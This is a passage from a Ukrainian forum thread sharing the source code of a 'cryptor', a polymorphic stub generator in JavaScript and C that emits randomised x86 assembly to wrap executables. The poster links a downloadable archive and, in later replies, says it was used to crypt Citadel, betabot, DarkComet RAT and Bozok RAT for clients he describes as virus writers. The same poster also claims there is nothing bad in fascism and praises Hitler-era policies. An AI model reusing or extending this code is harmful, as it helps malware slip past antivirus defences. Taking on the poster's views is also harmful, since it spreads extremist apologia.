    if (_.isUndefined(i) || i < REG_EAX || i > REG_EBP) return(false); this.num |= ((1 << i)>>>0); return(true);},
  remove: function(i) { 
    if (_.isUndefined(i) || i < REG_EAX || i > REG_EBP) return(false); this.num &= ~ ((1 << i)>>>0) ; return(true);},
  toArrayIndex: function() {
    var x = []; _.each(_.range(REG_EBP+1), function(a){ if (this.has(a)) x.push(a)}, this); return(x); },
  toArrayIndexInverse: function() {
    var x = []; _.each(_.range(REG_EBP+1), function(a){ if (!this.has(a)) x.push(a)}, this); return(x); },
  toArrayNamesInverse: function() {return(_.map(this.toArrayIndexInverse(), function(x){ return (this.arrNames[x])}, this));},
  toArrayNames: function() {return(_.map(this.toArrayIndex(), function(x){ return (this.arrNames[x])}, this));},
  getInt: function () {return(this.num);},
  setInt: function (i) {this.num = i; return (true);},
  not: function() {this.num = ((~ this.num >>> 0) & 0x7f); return(true);}};

module.exports.SetRegister = SetRegister;
module.exports.SetRegister.prototype = SetRegisterProto;
SetRegister.prototype = SetRegisterProto;

function Registers() {
  var rn = [['eax', 'ax', 'ah', 'al'], ['ebx', 'bx', 'bh', 'bl'], ['ecx', 'cx', 'ch', 'cl'], ['edx', 'dx', 'dh', 'dl'], 
  ['esi', 'si', null, null ], ['edi', 'di', null, null], ['ebp', 'bp', null, null]];
  this.container = []; this.used = new SetRegister();
  _.each(rn, function(x, y) { this.container[y] = new Register(x[0], x[1], x[2], x[3]); }, this);};

RegistersProto = {

  objToIndex : function (a) {
  var b = null; _.find(this.container, function (x, y) { if (x === a) b=y; return (x === a);}, this); return(b);},

  arrIndexToArrObj : function (a) {
  if (_.isUndefined(a) || (!_.isArray(a)) || _.find(a, function(x) {if (x>REG_EBP || x<REG_EAX) return(true);})) return(null); 
  return(_.map(a, function(x) { return(this.container[x]); }, this))},

  getIndexByName : function (sName){
  var num = NaN; _.find(this.container, function(x, y) { if (x.name[0]===sName) {num = y; return(true);} }, this); return (num);},

  getByIndex : function (i) { if (_.isUndefined(i) || i < REG_EAX || i > REG_EBP) return(null); return(this.container[i]);},

  getArrFreeIndex : function () { return(this.used.toArrayIndexInverse()); },

  getArrFreeName : function () {return(this.used.toArrayNamesInverse());},

  getArrFreeObj : function (){return(_.filter(this.container, function(x) {return(!x.using);}, this));},

  getUsedIndex : function () {return(this.used.toArrayIndex());},

  getUsedNames : function() {return(this.used.toArrayNames());},

  getUsedObj : function () {return(this.arrIndexToArrObj(this.used.toArrayIndex()));},
  
  getFreeIndex : function(flags) {
    var rs = this.getArrFreeObj(), r, res; 
    if (flags & USE_ONLY_GENERAL_REGS) rs = _.filter(rs, function(x) {return(x.isGeneral());}, this); 
    if (!_.size(rs)) return(NaN); 
    r = arrRndValue(rs); 
    if (flags & LOCK_REG) r.lock(); 
    res = this.objToIndex(r);
    if (!(flags & DONT_ADD_TO_LIST)) this.used.add(res); 
    return(res);
  },

  getFreeObj : function(flags) {
    var rs = this.getArrFreeObj(), r; 
    if (flags & USE_ONLY_GENERAL_REGS) rs = _.filter(rs, function(x) { return(x.isGeneral()); }, this); 
    if (!_.size(rs)) return(null); 
    r = arrRndValue(rs); 
    if (flags & LOCK_REG) r.lock();
    if (!(flags & DONT_ADD_TO_LIST)) this.used.add(this.objToIndex(r)); 
    return(r);
  }
}

module.exports.Registers = Registers;
module.exports.Registers.prototype = RegistersProto;
Registers.prototype = RegistersProto;

function Variable (sName, iSize) {
  this.name = sName; this.use = false; this.size = iSize;};

module.exports.Variable = Variable;

function Variables () {
  this.container = new Array();};
  
VariablesProto = {

  add : function (sName, iSize) { if (!sName) return(null); if (!iSize) iSize = 4; if (!this.isExists(sName)) return(this.container.push(new Variable(sName, iSize))); return(null); },

  isExists : function (sName) {
  return((!_.isUndefined(sName)) && (_.find(this.container, function(x){ return (x.name === sName) }, this)));},

  toString : function (sName) {
  return(_.reduce(_.shuffle(this.container), function (m, x) {return(m+' local  '+x.name+this.getAsmType(x.size)+'\n')}, '', this));},

  getAsmType : function(i) {
  var obj = {'1':':Byte', '2':':WORD', '4':':DWORD', '8':':QWORD'}; if (_.isUndefined(i) || i < 1 || (!_.isNumber(i))) return(null);
  if (_.has(obj, i)) return(obj[i]); return ('['+i.toHex()+']:BYTE');},

  getSize : function() {
    return(_.reduce(this.container, function(memo, v) { return memo + alignBy (v.size, 0x4); }, 0, this));}
};

module.exports.Variables = Variables;
Variables.prototype = VariablesProto;
module.exports.Variables.prototype = VariablesProto;

//module.exports.Variables.ptototype = VariablesProto;
function ExecutionEnvironment(sName, sCallConv, arrParam) {
  var f;
  this.regs = new Registers(); this.vars = new Variables(); this.name = sName; 
  this.callconv = sCallConv;
  if (sCallConv == 'stdcall') { this.regs.container[REG_EBP].lock(); };
  this.tableCmd = [];
  f = function (p, f) {
    f.emit([['add', p[0].s, '1'], ['sub', p[0].s, '-1'], ['inc', p[0].s], ['lea', p[0].s, '['+p[0].s+'+0x1]']][_.random(3)]); return(true);}
  this.tableCmd.push(['inc', ['r8'], 1, f]); 
  this.tableCmd.push(['inc', ['r16'], 1, f]); 
  this.tableCmd.push(['inc', ['r32'], 1, f]); 
  f = function (p, f) {
    f.emit([['add', p[0].s, '1'], ['sub', p[0].s, '-1'], ['inc', p[0].s]][_.random(2)]); return(true);}
  this.tableCmd.push(['inc', ['m32'], 1, f]);
  f = function (p, f) {
    f.emit(['add', p[1].s, p[0].s]); return(true);};
  this.tableCmd.push(['add', ['c8', 'r8'], 2, f]); 
  this.tableCmd.push(['add', ['c16', 'r16'], 2, f]); 
  f = function (p, f) {
    f.emit([['add', p[1].s, p[0].s], ['lea', p[1].s, '['+ p[1].s+'+'+unchainConst(p[0].s)+']']][_.random(1)]); return(true);};
  this.tableCmd.push(['add', ['c32', 'r32'], 2, f]);
  f = function (p, f) {f.emit([['add', p[1].s, p[0].s], ['lea', p[1].s, '['+p[0].s+'+'+p[1].s+']']][_.random(1)]); return(true);}
  this.tableCmd.push(['add', ['r32', 'r32'], 2, f]);
  f = function (p, f) {
    f.emit([['push', p[0].s, ';', 'pop', p[1].s], ['mov', p[1].s, p[0].s]][_.random(1)]); return(true);};
  this.tableCmd.push(['load', ['m32', 'r32'], 2, f]); 
  this.tableCmd.push(['load', ['r32', 'm32'], 2, f]); 
  this.tableCmd.push(['load', ['r32', 'r32'], 2, f]); 
  this.tableCmd.push(['load', ['c32', 'r32'], 2, f]); 
  this.tableCmd.push(['load', ['c32', 'm32'], 2, f]);
  f = function (p, f) {
    f.emit(['push', p[0].s, ';', 'pop', p[1].s]); 
    return(true); };
  this.tableCmd.push(['load', ['m32', 'm32'], 2, f]);
  f = function (p, f) {
    f.emit([['add', p[0].s, '-0x1'], ['sub', p[0].s, '0x1'], ['dec', p[0].s], ['lea', p[0].s, '['+p[0].s+'-0x1]']][_.random(3)]); 
    return(true); };
  this.tableCmd.push(['dec', ['r8'], 1, f]); this.tableCmd.push(['dec', ['r16'], 1, f]); this.tableCmd.push(['dec', ['r32'], 1, f]);
  f = function(p, f) { 
    f.emit([['test', p[0].s, p[0].s], ['cmp', p[0].s, (0).toHex()], ['or', p[0].s, p[0].s]][_.random(2)]);
    return(true);
  };
  this.tableCmd.push(['checkz', ['r8'], 1, f]); 
  this.tableCmd.push(['checkz', ['r16'], 1, f]); 
  this.tableCmd.push(['checkz', ['r32'], 1, f]);
  f = function(p, f) {
    f.emit([['mov', p[0].s, '0x0'], ['push', '0x0', ';', 'pop', p[0].s], ['and', p[0].s, '0x0'], ['xor', p[0].s, p[0].s], ['sub', p[0].s, p[0].s]][_.random(4)]); 
    return(true)
  };
  this.tableCmd.push(['loadz', ['r32'], 1, f]);
  f = function(p, f) { 
   var c; 
   if (([REG_ESI, REG_EDI, REG_EBP]).indexOf(p[1].i)>=0) {c = 0;} else {c = _.random(1);}
   if (c===0) { f.emit(['movzx', p[1].s, p[0].s]); } else { f.cmd('loadz_r32', [p[1].i]); f.emit(['mov', f.toType('r8', p[1].i+REG_R8L).s, p[0].s]);} 
   return(true);};    
  this.tableCmd.push(['loadzx', ['m8', 'r32'], 2, f]);
  f = function(p, f) { 
    var c; 
    if (p[1].i in [REG_ESI, REG_EDI, REG_EBP]) {c = 0;} else {c = _.random(1);}
    if (!c) {f.emit(['movzx', p[1].s, p[0].s]); } else { f.cmd('loadz_r32', [p[1].i]); f.emit(['mov', f.toType('r16', p[1].i+REG_R16).s, p[0].s]);} 
    return(true);};    
  this.tableCmd.push(['loadzx', ['m16', 'r32'], 2, f]);
  f = function(p, f) {
    var r;
    if (_.random(1)) {
      f.emit(['cmp', p[1].s, p[0].s]);
    } else {
      r = f.getFreeReg(LOCK_REG); 
      f.cmd('loadzx_m16$r32', [unchainMem(p[1].s), r.i]);
      f.emit(['cmp', r.s, (p[0].i).toHex()]); 
      r.o.unlock();
    }; 
    return(true);
  };
  this.tableCmd.push(['check', ['c16', 'm16'], 2, f]); 
  f = function(p, f) { 
    f.emit(['cmp', p[1].s, p[0].s]); return(true); };
  this.tableCmd.push(['check', ['c32', 'm32'], 2, f]); 
  this.tableCmd.push(['check', ['m32', 'r32'], 2, f]);
  this.tableCmd.push(['check', ['r32', 'm32'], 2, f]);
  this.tableCmd.push(['check', ['m32', 'r32'], 2, f]);
  this.useForResult = null; this.params = arrParam; this.code = ''; this.settings = {fTrashGen: false}; this.depth = 0;
};

ExecutionEnvironmentProto = {
  emit : function (line) {
  ax = []; ay= []; if (_.isString(line)) {this.code+=line;return(line);} if (!_.isArray(line)) return(null);
  _.each(line, function(x, i, arr) { if (x == ';') { ay.push(ax); ax = []; return(0); } ax.push(x); } , this); if (_.size(ax)) ay.push(ax); 
  this.code+=_.reduce(ay, function(m, x) { var s =''; if(_.size(x)){s='  '+pad(x[0], 8); 
  if (_.size(x) > 1) { s += x.slice(1).join(', ');}} return(m+s+'\n');}, '', this);return(true);},

  finalize : function(r) {
  if (this.callconv == 'stdcall') {
    var sResultType, bSaveUsedRegs = _.random(1), optimize = _.random(1);
    regz = this.regs.getUsedIndex();
    if (bSaveUsedRegs && _.isNumber(this.useForResult)) {
      if (this.useForResult == REG_EAX && optimize ) {this.regs.used.remove(REG_EAX);} 
      else { this.vars.add('iResult'); this.cmd('load_r32$m32', [this.useForResult, 'iResult']); }; 
    } else { 
      this.vars.add('iResult');
      if (_.isNumber(this.useForResult)) {this.cmd('load_r32$m32', [this.useForResult, 'iResult']);} else {
        if (!this.vars.isExists(this.useForResult)) {this.cmd('load_m32$m32', [this.useForResult, 'iResult']);};};
    };
    if (bSaveUsedRegs) {
      this.depth = _.size(this.regs.getUsedNames())*4;
      console.log('DEPTH1 = '+this.depth.toHex());
      this.code = _.reduce(this.regs.getUsedNames(), function(memo, i) {return('  push  '+i+'\n'+memo+'  pop   '+i+'\n');}, this.code, this);}
    else { this.depth = 0x20; console.log('DEPTH1 = '+this.depth.toHex()); this.code = '  pusha\n'+this.code+'  popa\n';};
    console.log('DEPTH1 = '+this.depth.toHex());
    this.depth += this.vars.getSize()+0x8+_.size(this.param)*0x4;
    console.log('VARSIZE = '+this.vars.getSize().toHex());
    console.log('DEPTH2 = '+this.depth.toHex());
    if (!(optimize && bSaveUsedRegs && this.useForResult === REG_EAX)) {this.cmd('load_m32$r32', ['iResult', REG_EAX]); };
    this.code = 'proc  '+this.name+' '+this.params.join(', ')+'\n'+this.vars+this.code+'  ret\nendp\n';
//    this.depth = 
    return (true);};
  return(false);},

  setUseForResult : function(r) { return ((_.isString(r)||_.isNumber(r))?(this.useForResult = r)|true:false) },

  toString : function () {return(this.code);},

  toType : function(t, v) {
   var getRSZ, isMem, toMem, toReg, oTableType; getRSZ = function(a) { return((a>>3)&3); };
   isMem = function (a){ return(_.isString(a) ? '['+a+']': null); };
   toMem = function (m, i) { var obj = {'0':'DWord', '1':'Word', '2':'Byte'}, p; if (_.isUndefined(i)||(!(p = isMem(m)))||(!_.isNumber(i))) 
   return(null); if (_.has(obj, i)) return({s:obj[i]+' '+p, o: null, i:null}); return(null); }
   toReg = function (p, ee) { return({i: p, o: ee.regs.getByIndex(p&7), s: ee.regs.getByIndex(p&7).toString(getRSZ(p))});};
   oTableType = {
    'm32': function (p, ee) {return(toMem(p, MEM32));}, 
    'm16': function (p, ee) {return(toMem(p, MEM16));}, 
    'm8': function (p, ee) {return(toMem(p, MEM8));}, 
    'r32': function (p, ee) {return((_.isUndefined(p) || (p<REG_EAX) ||p>REG_EBP) ? null:toReg(p, ee));},
    'r16': function (p, ee) {return((_.isUndefined(p) || (getRSZ(p)!==REG_LOWORD)) ? null:toReg(p, ee));},
    'r8': function (p, ee) {return((_.isUndefined(p) || (getRSZ(p)!==REG_HIBYTE&&getRSZ(p)!==REG_LOBYTE)) ? null:toReg(p, ee))},
    'c32': function (p, ee) { return(((!_.isUndefined(p))&&_.isNumber(p)) ? {o:null,s:'DWORD ' + p.toHex(),i:p} : (_.isString(p) ? {o:null, s:p, i:null}: null) )},
    'c16': function (p, ee) { return(((!_.isUndefined(p))&&_.isNumber(p)) ? {o:null,s:'WORD ' + p.toHex(),i:p} : (_.isString(p) ? {o:null, s:p, i:null}: null) )},
    'c8': function (p, ee) { return(((!_.isUndefined(p))&&_.isNumber(p)) ? {o:null,s:'BYTE ' + p.toHex(),i:p} : (_.isString(p) ? {o:null, s:p, i:null}: null) )}
   };
   return(_.has(oTableType,t)?oTableType[t](v,this):null);
  },

  cmd : function(name, params) {
    var p = [], c = _.find(this.tableCmd, function(x) { return ( (!_.size(x[1])) || (x[0]+'_'+x[1].join('$')===name));}, this);
    if ((!c)||(!_.isFunction(c[3]))) return(false); _.each(c[1], function (x, i) { var v = this.toType(x, params[i]); 
    if (v) p.push(v);}, this); if (_.size(p)!==c[2]) return(false); c[3](p, this); return(true);},
  
  getFreeReg: function(f) {
  return(this.toType('r32', this.regs.getFreeIndex(f)));}};

module.exports.ExecutionEnvironment = ExecutionEnvironment;
module.exports.ExecutionEnvironment.prototype = ExecutionEnvironmentProto;
ExecutionEnvironment.prototype = ExecutionEnvironmentProto;

settings.js

var fs = require('fs');
module.exports.DATAPLACE_GENERATE = DATAPLACE_GENERATE = 0x1;
module.exports.DATAPLACE_DATASECT = DATAPLACE_DATASECT = 0x2;
module.exports.DATAPLACE_CODESECT = DATAPLACE_CODESECT = 0x3;
module.exports.DATAPLACE_RESOURCE = DATAPLACE_RESOURCE = 0x4;
module.exports.settings = null;

module.exports.readSettings = function (fn) {
 console.log(fn+'\n');
 module.exports.settings = JSON.parse(fs.readFileSync(fn));
}

module.exports.saveSettings = function (fn, depth, time, offset) {
  module.exports.settings.stackdepth = depth;
  module.exports.settings.datatime = time;
  module.exports.settings.loadpe.offset = offset;
  fs.writeFileSync(fn, JSON.stringify(module.exports.settings));
}

entry.c

#define LEAN_AND_MEAN
#pragma lib "kernel32.lib"
#pragma lib "user32.lib"

#include <windows.h>
#include <stdlib.h>

extern void WINAPI CryptMain(void);

int CALLBACK WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
 CryptMain();
 return(0);
}
Post's attachments

StubGenerator.zip 70.36 kb, 810 downloads since 2015-01-02 

Подякували: leofun011

5

Re: [Джерельний код] Криптор

Перепрошую, По офтоплю в один пост;
вражають приємні закарлючки кодування, особливо platform.js
Пане 0xDADA11C7, то що ви згідно цитати місцевий хакер та вірусописець :) ?

Криптор (від англ. Cryptor — шифрувальник) — назва ряду програм для криптозахисту виконуваних файлів. Використовуються переважно вірусописцями й хакерами для маскування шкідливого програмного забезпечення.

Подякували: A.N.Onim1

6

Re: [Джерельний код] Криптор

Особисто в мене і підпис ваш, 0xDADA11C7, викликає не слабке здивування (хоча це начебто було пояснено як "іронія"), і рід занять - вірусописець, причому гордий своєю справою...

Мене, як психолога-любителя, в зв'язку з цим цікавить одне питання "Чому?". Ви не вважаєте негативними явищами гітлера та написання вірусів? Чи, наприклад, вибірковість зараження вірусами для вас має значення, і не всі повинні їх підхоплювати?

7

Re: [Джерельний код] Криптор

Анатолій, Криптором можна і нормальні розробки захищати від зворотньої розробки (принаймні ускладнити її), наприклад Ваші варезні додатки від кракерів чи таблетковиготовлювачив.

8

Re: [Джерельний код] Криптор

Анатолій написав:

Пане 0xDADA11C7, то що ви згідно цитати місцевий хакер та вірусописець :) ?

Згідно цитати - вони мої замовники  8)

9

Re: [Джерельний код] Криптор

ktretyak написав:

Мене, як психолога-любителя, в зв'язку з цим цікавить одне питання "Чому?". Ви не вважаєте негативними явищами гітлера та написання вірусів? Чи, наприклад, вибірковість зараження вірусами для вас має значення, і не всі повинні їх підхоплювати?

Оскільки я хочу суспільних змін, а ще з часів Сталіна вся опозиція таврується "фашизмом", то вважаю за потрібним розповісти, що нічого поганого в "фашизмі" нема. Це не стосується історії взагалі, як і аргументація опонентів :)

Прихований текст

З іншого боку я цілком усвідомлюю, що стіки економічої свободи, як за Гітлера, ми бачили тільки на картинках і Chemist-i на ютубному каналі Балашова. Економічні свободи, розбудова інфраструктури любо моєму серцю.

http://upload.wikimedia.org/wikipedia/uk/4/4b/Reichskommissariatukraine-uk.png

Хоча от Ерік Кох виявився рідкісною падлюкою і співпрацював з комуняками.

Щодо написання вірусів, то тут цікавить саме економічні свободи, культурний простір і коло спілкування.
Як тільки буде можливість - піду робити бойових роботів і люструвати ментів, але до цього ще треба дійти. Скоріш за все наповнення цього розділу буде за наступним ланцюжком - хак - геймдев - осдев

Подякували: morgot, leofun012

10

Re: [Джерельний код] Криптор

Chemist-i написав:

Анатолій, Криптором можна і нормальні розробки захищати від зворотньої розробки (принаймні ускладнити її), наприклад Ваші варезні додатки від кракерів чи таблетковиготовлювачив.

Дякую, за роз'яснення, (криптор - шифрування ресурсів, ок); для мого рівня це ще рано, але корисно знати що таке є, через рік чи пізніше розгляну матеріал.
але я нажаль на такому рівні веб-розвитку розвитку, що не розумію що таке " варезні додатки кракерів чи таблетковиготовлювачив"?

А ще в пана HetmanNet-а зустрів :)

Ні, бо я бубонтоголовий
Так, бо я бубонтоголовий

що він цим хотів сказати, що людина дуже розумна чи навпаки слабка на розум :) :) :)

11

Re: [Джерельний код] Криптор

Ваші варезні додатки від кракерів чи таблетковиготовлювачив
...
бубонтоголовий - (сленг HetmanNet only) Користувач ОС Лінукс Убунту (Бо ГетьманНет вважає, що Убунту не лінукс)

Подякували: Анатолій1

12 Востаннє редагувалося Анатолій (03.01.2015 20:44:36)

Re: [Джерельний код] Криптор

0xDADA11C7 написав:

Оскільки я хочу суспільних змін, а ще з часів Сталіна вся опозиція таврується "фашизмом", то вважаю за потрібним розповісти, що нічого поганого в "фашизмі" нема. Це не стосується історії взагалі, як і аргументація опонентів :)

.....

Хоча от Ерік Кох виявився рідкісною падлюкою і співпрацював з комуняками.

Щодо написання вірусів, то тут цікавить саме економічні свободи, культурний простір і коло спілкування.
.....

Я особисто теж за свободи, зростання Особистості та її Нації, без пригнічення своїх народів-сусідів.
А до історії ставлюсь , що було то було, і ніхто не скаже чи до кращого, чи до гіршого могло привести інший розвиток подій Великої Вітчизняної.
Зараз я знаю/чув, що історію переписують великі люди світу цього, подають її у вигідному для себе світлі, і хто правий хто ні,- наразі я сказати не можу. В мене не має бажання  витрачати свій час на дослідження саме достовірної історії, та й ще може бути такий варіант, як не має доброї та злої історії, погані та хороші, так що виходить з якої сторони подивитись на історію.
Питання "- Що тобі дасть знання достовірної історії?"
- Моральне зростання, перевага над іншими. - Можливо і іншим чином зростати.
- Повага до історії свого краю.- Цей варіант був би прийнятним для мене, але нажаль, я її не знаю.

13

Re: [Джерельний код] Криптор

Анатолій написав:

народів-сосідів

По фрейду.

14

Re: [Джерельний код] Криптор

По фрейду.

Ваш "фрейд" позинається з малої літери. Щоб він про це сказав?

Подякували: A.N.Onim1

15

Re: [Джерельний код] Криптор

0xDADA11C7 написав:

По фрейду.

Ваш "фрейд" позинається з малої літери. Щоб він про це сказав?

"Іронія" пане, він би сказав "Іронія" (саме так)

16

Re: [Джерельний код] Криптор

Зізнавайтесь,яке шкідливе пз криптували цією штуковиною? :)

17

Re: [Джерельний код] Криптор

VTrim написав:

Зізнавайтесь,яке шкідливе пз криптували цією штуковиною? :)

Ви ж самі бачити, hello.exe і calc.exe
Ну якщо hello.exe не така шкідлива програма, то віндузовський калькулятор.... =)

Подякували: leofun011

18

Re: [Джерельний код] Криптор

VTrim написав:

Зізнавайтесь,яке шкідливе пз криптували цією штуковиною? :)

Citadel, betabot, DarkComet RAT, Bozok RAT, ...

Подякували: leofun011

19

Re: [Джерельний код] Криптор

За вами вже виїхали. :D

20 Востаннє редагувалося Kane (04.01.2015 12:25:49)

Re: [Джерельний код] Криптор

Прихований текст

З такими темпами доведеться змінити назву та профіль форуму (ну там Replace Hack Group) xD

п.C. до речі, були два подібної тематики, україномовних: hackua.com та hackzona.com.ua.